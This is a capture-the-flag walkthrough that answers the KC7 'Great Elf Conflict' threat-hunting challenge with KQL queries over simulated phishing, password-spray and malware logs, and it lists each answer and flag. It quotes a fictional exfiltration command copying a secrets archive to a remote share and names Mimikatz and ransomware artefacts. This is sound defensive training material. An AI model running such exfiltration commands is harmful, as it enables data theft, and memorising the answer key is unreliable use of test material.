Skip to content

The Great Elf Conflict⚓︎

Difficulty:
image

This challenge explained that if you answered all sections, you would get Gold so there is no "Silver" in this walkthrough.

Gold⚓︎

Section 1: KQL 101⚓︎

After a couple of "getting acclimated" questions, the actual questions start on Q3.

3: How many elves are there?⚓︎

Employees
| count
90

4: Who is the Chief Toy Maker?⚓︎

Employees
| where role == "Chief Toy Maker"
Shinny Upatree

5: Informational⚓︎

Not really a question, but more "getting acclimated" with operators: Here are some additional operators the North Pole Cyber Defense Unit commonly uses.

== : Checks if two values are exactly the same. Case-sensitive.

contains : Checks if a string appears anywhere, even as part of a word. Not case-sensitive.

has : Checks if a string is a whole word. Not case-sensitive.

has_any : Checks if any of the specified words are present. Not case-sensitive.

in : Checks if a value matches any item in a list. Case-sensitive.

type operator to continue. 

operator

6: How many emails did Angel Candysalt receive?⚓︎

First we need to grab Angel's email adderess: 

Employees
| where name == "Angel Candysalt"
Then we craft our query: 
Email
| where recipient == "angel_candysalt@santaworkshopgeeseislands.org"
| count
31

7: How many distinct recipients were seen in the email logs from twinkle_frostington@santaworkshopgeeseislands.org?⚓︎

Email
| where sender == "twinkle_frostington@santaworkshopgeeseislands.org"
| count
32

8: How many distinct websites did Twinkle Frostington visit?⚓︎

First we need to know Twinkle's IP address so let's grab that: 

Employees 
| where name = "Twinkle Frostington"
This provides us with the IP which we then plug into: 
OutboundNetworkEvents
| where src_ip == "10.10.0.36"
| distinct url
| count
4

9: How many distinct domains in the PassiveDns records contain the word green?⚓︎

PassiveDns
| where domain contains "green"
| distinct domain
| count
10

10: How many distinct URLs did elves with the first name Twinkle visit?⚓︎

This one gets us into storing variables for easier reference.

let twinkle_ips =
Employees
| where name has "Twinkle"
| distinct ip_addr;
OutboundNetworkEvents
| where src_ip in (twinkle_ips)
| distinct url
| count
8

section2

Section 2: Operation Surrender⚓︎

Mission: Find out how Team Alabaster got the upper hand.

1: type surrender⚓︎

surrender

2: Who was the sender of the phishing email that set this plan into motion?⚓︎

(this question said "who" so I thought it was supposed to be a person, not an email address - went down a rabbit hole thinking I needed more than just the email, but alas, the email was all the question wanted.) What email sent the surrender emails? 

Email
| where subject contains "surrender"
surrender@northpolemail.com

let phished_emails =
Email
| where subject contains "surrender"
| distinct recipient; // Extract only the email addresses
let compromised_IPs =
Employees
| where email_addr in (phished_emails)
| distinct ip_addr; // Extract distinct IP addresses
OutboundNetworkEvents
| where src_ip !in (compromised_IPs) and url contains "albastersurrender"
This did not return any results, but I know the query worked because reversing the "!in" to be just "in" did include all of the compromised IPs.
let TeamAlabasterIPs =
Employees
| where hostname contains "Elf-Lap-A"
| distinct username;
let TeamWombleyIPs =
Employees
| where hostname contains "Elf-Lap-W"
| distinct username;
FileCreationEvents
| where filename contains "Surrender.docx" and username !in (TeamWombleyIPs)
Also didn't work.

3: How many elves from Team Wombley received the phishing email?⚓︎

Email
| where subject contains "surrender"
| distinct recipient
| count
22

4: What was the filename of the document that Team Alabaster distributed in their phishing email?⚓︎

Email
| where subject contains "surrender"
Team_Wombley_Surrender.doc

5: Who was the first person from Team Wombley to click the URL in the phishing email?⚓︎

let phished_emails =
Email
| where subject contains "surrender"
| distinct recipient; // Extract only the email addresses
let compromised_IPs =
Employees
| where email_addr in (phished_emails)
| distinct ip_addr; // Extract distinct IP addresses
OutboundNetworkEvents
| where src_ip in (compromised_IPs) and url contains "albastersurrender"


Employees 
| where ip_addr == "10.10.0.25"
Joyelle Tinseltoe

Joyelle's hostname: Elf-Lap-W-Tinseltoe

6: What was the filename that was created after the .doc was downloaded and executed?⚓︎

ProcessEvents

| where timestamp between(datetime("2024-11-27T14:11:45Z") .. datetime("2024-11-28T14:11:45Z")) //you’ll need to modify this

| where hostname == "Elf-Lap-W-Tinseltoe"
keylogger.exe

7:⚓︎

let flag = "keylogger.exe";
let base64_encoded = base64_encode_tostring(flag);
print base64_encoded
a2V5bG9nZ2VyLmV4ZQ==

section3

Section 3: Operation Snowfall⚓︎

1: Type snowfall to begin⚓︎

snowfall

2: What was the IP address associated with the password spray?⚓︎

This filter was given and worked as-is without modification: 

AuthenticationEvents
| where result == "Failed Login"
| summarize FailedAttempts = count() by username, src_ip, result
| where FailedAttempts >= 5
| sort by FailedAttempts desc
59.171.58.12

3: How many unique accounts were impacted where there was a successful login from 59.171.58.12?⚓︎

AuthenticationEvents
| where result == "Successful Login" and src_ip == "59.171.58.12"
| distinct username
| count
23

4: What service was used to access these accounts/devices?⚓︎

AuthenticationEvents
| where result == "Successful Login" and src_ip == "59.171.58.12"
RDP

5: What file was exfiltrated from Alabaster’s laptop?⚓︎

ProcessEvents
| where username == "alsnowball"
copy C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip \wocube\share\alsnowball\Secret_Files.zip Secret_Files.zip

6: What is the name of the malicious file that was run on Alabaster's laptop?⚓︎

Same filter as Q5. EncryptEverything.exe

7: To obtain your flag use the KQL below with your last answer!⚓︎

let flag = "EncryptEverything.exe";
let base64_encoded = base64_encode_tostring(flag);
print base64_encoded

RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl

section4

Section 4: Echoes in the Frost⚓︎

1: Type stay frosty to begin⚓︎

stay frosty

2: What was the timestamp of first phishing email about the breached credentials received by Noel Boetie?⚓︎

Email
| where subject contains "breach"
2024-12-12T14:48:55Z

OutboundNetworkEvents
| where url == "https://holidaybargainhunt.io/published/files/files/echo.exe"
2024-12-12T15:13:55Z

4: What was the IP for the domain where the file was hosted?⚓︎

PassiveDns
| where domain contains "holidaybargainhunt.io"
182.56.23.122

5: Let’s take a closer look at the authentication events. I wonder if [there were any] any connection events from 182.56.23.122. If so what hostname was accessed?⚓︎

AuthenticationEvents
| where src_ip == "182.56.23.122"
WebApp-ElvesWorkshop

6: What was the script that was run to obtain credentials?⚓︎

ProcessEvents
| where hostname == "WebApp-ElvesWorkshop"
Invoke-Mimikatz.ps1

7: What is the timestamp where Noel executed the file?⚓︎

ProcessEvents
| where username contains "boetie"
2024-12-12T15:14:38Z

Section 4⚓︎

1: What domain was the holidaycandy.hta file downloaded from?⚓︎

OutboundNetworkEvents
| where url contains "holidaycandy.hta"
compromisedchristmastoys.com

2: what was the first file that was created after extraction?⚓︎

ProcessEvents
| where process_commandline contains "frosty"
sqlwriter.exe

3: What is the name of the property assigned to the new registry key?⚓︎

Using same filter as above and same entry. frosty

4: To obtain your FINAL flag use the KQL below with your last answer!⚓︎

let finalflag = "frosty";
let base64_encoded = base64_encode_tostring(finalflag);
print base64_encoded
ZnJvc3R5

Entering in the final answers to each section gets you the credit back in the game: Click Badge > Objectives > Microsoft KC7